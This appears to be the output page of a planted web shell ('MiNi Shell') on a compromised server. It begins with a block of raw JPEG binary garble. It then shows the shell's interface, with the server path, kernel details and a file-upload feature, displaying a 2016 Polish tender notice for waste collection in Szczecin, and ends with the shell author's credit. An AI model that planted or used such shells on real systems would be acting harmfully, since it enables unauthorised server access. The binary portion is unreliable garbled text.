JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160229/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160229/20023-N-2016.html

<p class="kh_header"><b>Szczecin: ŚWIADCZENIE USŁUG ODBIORU I ZAGOSPODAROWANIA ODPADÓW KOMUNALNYCH Z ZAKŁADU USŁUG KOMUNALNYCH W SZCZECINIE</b><br>
<b>Numer ogłoszenia: 20023 - 2016; data zamieszczenia: 29.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Usług Komunalnych , ul. Ku Słońcu 125a, 71-080 Szczecin, woj. zachodniopomorskie, tel. 91 484 82 94, faks 91 484 80 55.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zuk.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG ODBIORU I ZAGOSPODAROWANIA ODPADÓW KOMUNALNYCH Z ZAKŁADU USŁUG KOMUNALNYCH W SZCZECINIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług polegających na odbiorze                                               i zagospodarowaniu odpadów komunalnych gromadzonych na terenie obiektów będących w zarządzaniu Zakładu Usług Komunalnych w Szczecinie. Wykaz lokalizacji wszystkich obiektów, dla których będzie świadczona usługa wraz z ich wyposażeniem w pojemniki i kontenery do gromadzenia odpadów komunalnych, stanowi załącznik nr 6 do SIWZ.
CPV 
90513000-6 Usługi obróbki i usuwania odpadów, które nie są niebezpieczne 
90512000-9 Usługi transportu odpadów 
90511000-2 Usługi wywozu odpadów
2.	Przedmiot zamówienia może być realizowany wyłączenie przez przedsiębiorcę wpisanego do rejestru działalność regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu Gminy Miasto Szczecin, o którym mowa w art. 9b i następnych ustawy z dnia 13 września 1996 r. o utrzymaniu czystości  i porządku w gminach.
3.	Szczegółowy zakres przedmiotu zamówienia obejmuje:
1)	wyposażenie obiektów w pojemniki i/lub kontenery przeznaczone do gromadzenia zmieszanych odpadów komunalnych oraz odpadów gromadzonych w sposób selektywny, które muszą odpowiadać wymogom określonym w Regulaminie utrzymania czystości i porządku na terenie Gminy Miasto Szczecin,
2)	utrzymanie pojemników i/lub kontenerów w odpowiednim stanie sanitarnym, porządkowym i technicznym,
3)	odbiór zmieszanych niesegregowanych odpadów komunalnych o kodzie 
20 03 01, zgromadzonych w pojemnikach lub kontenerach, zgodnie 
z harmonogramem stanowiącym załącznik nr 6 do SIWZ, w ilości szacunkowej 
2100 m3,
4)	odbiór odpadów komunalnych, gromadzonych w sposób selektywny 
w pojemnikach lub kontenerach, zgodnie z harmonogramem stanowiącym załącznik nr 6 do SIWZ, w ilości szacunkowej 9,4 m3, obejmujących:
a)	szkło, w tym opakowania szklane, z wyłączeniem opakowań po środkach ochrony roślin, środkach medycznych i truciznach - o kodzie 20 01 02,
b)	tworzywa sztuczne, w tym opakowania z tworzyw sztucznych, 
z wyłączeniem opakowań po środkach ochrony roślin, środkach medycznych 
i truciznach, gabarytowych odpadów z tworzyw sztucznych, zderzaków samochodowych - o kodzie 20 01 39,
5)	transport i przekazanie zmieszanych odpadów komunalnych do regionalnej instalacji przetwarzania odpadów komunalnych lub instalacjach zastępczych, określonych w Planie Gospodarki Odpadami dla Województwa Zachodniopomorskiego na lata 2012 - 2017 z uwzględnieniem perspektywy na lata 2018 -2023,
6)	transport i przekazanie selektywnie zebranych odpadów do instalacji odzysku lub unieszkodliwiania odpadów, zgodnie z hierarchią sposobów postępowania 
z odpadami, o której mowa w art. 17 ustawy z dnia 14 grudnia 2012 r. 
o odpadach,
7)	sporządzanie wszelkiej sprawozdawczości i dokumentów przewidzianych 
w obrocie odpadami dotyczących odpadów odebranych od Zamawiającego oraz  przekazywanie tych informacji w odpowiedniej formie na drukach ustawowych uprawnionym organom nadzoru zgodnie z obowiązującymi przepisami prawa. 
4.	Zamówienie nie obejmuje odbioru i zagospodarowania odpadów pochodzących 
z robót budowlanych i remontowych, zużytego sprzętu elektrycznego i elektronicznego, opon i pozostałych frakcji odpadów nie wymienionych w pkt.3.
5.	Wykonawca zobowiązany jest do podstawienia pojemników, kontenerów i wywozu odpadów zgodnie z częstotliwością podaną w załączniku nr 6 do SIWZ.
6.	Wykonawca zobowiązany będzie do dostosowania godzin odbioru odpadów do godzin funkcjonowania poszczególnych obiektów wskazanych w załączniku nr 6 do SIWZ.
7.	Zamawiający zastrzega sobie prawo do zmian tj. zmniejszenia lub zwiększenia pojemności, ilości pojemników/kontenerów oraz zmian dotyczących częstotliwości wywozu pojemników/kontenerów.  
8.	W przypadku powyższych zmian dotyczących zwiększenia ilości pojemników/kontenerów Wykonawca zobowiązany będzie do wyposażenia danego obiektu w terminie 1 dnia roboczego od dnia przekazania informacji przez Zamawiającego.
9.	W przypadku powyższych zmian dotyczących zmniejszenia ilości pojemników/kontenerów Wykonawca zobowiązany będzie do odebrania z obiektu pojemnika z zawartością i zakończenia świadczenia usług odbioru odpadów komunalnych w terminie zgodnym z cyklem odbioru przewidzianego harmonogramem, jednak nie dłużej niż 7 dni od otrzymania informacji od Zamawiającego.
10.	Wykonawca jest zobowiązany do naprawy lub ponoszenia kosztów napraw szkód wyrządzonych podczas lub w związku z wykonywaniem usługi. Wykonawca ponosi pełną odpowiedzialność wobec Zamawiającego i osób trzecich za szkody na mieniu lub zdrowiu osób trzecich, powstałe podczas lub w związku z realizacja przedmiotu zamówienia.
11.	Wykonawca zobowiązany jest do bieżącego prowadzenia ewidencji odbioru 
i zagospodarowania odpadów odebranych z Zakładu Usług Komunalnych, zgodnie z przepisami prawa oraz udostępnianie danych objętych ewidencją Zamawiającemu lub na żądanie.
12.	Wykonawca zobowiązany jest do sporządzania i przekazywania Zamawiającemu 
w formie papierowej i elektronicznej miesięcznych sprawozdań zawierających informacje o łącznej objętości poszczególnych rodzajów odpadów odebranych w ramach realizacji umowy z wyszczególnieniem zmieszanych odpadów komunalnych oraz poszczególnych rodzajów odpadów komunalnych gromadzonych w sposób selektywny. Sprawozdanie to Wykonawca zobowiązany jest dołączyć do faktury. 
13.	Podmiot realizujący usługę w całym okresie obowiązywania umowy gwarantuje odpowiedni stan techniczny i sanitarny pojazdów i pojemników. Dla właściwej realizacji przedmiotu umowy Wykonawca zapewni odpowiednią ilość obsługi, środków technicznych, gwarantujących terminowe i jakościowe wykonanie zakresu usługi.
14.	Wykonawca wyposaża własnych pracowników realizujących przedmiot zamówienia 
w odzież ochronną z logo firmy.
15.	W związku z realizacją zamówienia Wykonawca ponosi całkowita odpowiedzialność 
za prawidłowe gospodarowanie odpadami, zgodnie z obowiązującymi przepisami prawa.
16.	Rozliczenie wynagrodzenia za świadczenia usługi odbywa się oddzielnie dla każdego obiektu w ramach Umowy, w cyklu miesięcznym. Wykonawca będzie wystawiał fakturę za odbiór odpadów z wyszczególnieniem poszczególnych obiektów, po zakończeniu danego miesiąca kalendarzowego, nie później jednak niż w terminie 7 dni od ostatniego dnia danego miesiąca kalendarzowego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielanie zamówień uzupełniających: do 20 % wartości zamówienia podstawowego, zgodnie z art. 67 ust. 1 pkt 6 ustawy - polegających na powtórzeniu tego samego rodzaju usług.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.30.00-6, 90.51.20.00-9, 90.51.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>.   Ponadto wykonawcy mają dołączyć do oferty następujące dokumenty:
       1)  ofertę cenową - zgodnie z rozdziałem I pkt 3 SIWZ;
 	W przypadku składania oferty wspólnej należy złożyć jedną ofertę cenową;
         2) 	odpowiednie pełnomocnictwa;  
	Tylko w sytuacjach określonych w rozdziale I pkt 5 zdanie drugie SIWZ lub 
	w przypadku składania oferty wspólnej (rozdział III pkt 1 SIWZ); 
       3)	oświadczenie według wzoru stanowiącego załącznik nr 1 do SIWZ, wskazujące część 	zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli 	wykonawca przewiduje udział podwykonawców);
            W przypadku składania oferty wspólnej należy złożyć jedno oświadczenie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zuk.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego - 71-080 Szczecin, ul. Ku Słońcu 125A, pok. 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.03.2016 godzina 10:00, miejsce: Siedziba Zamawiającego - 71-080 Szczecin, ul. Ku Słońcu 125A, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zadanie nie dotyczy umowy ramowej.
2. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie SPEŁNIA/NIE SPEŁNIA..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com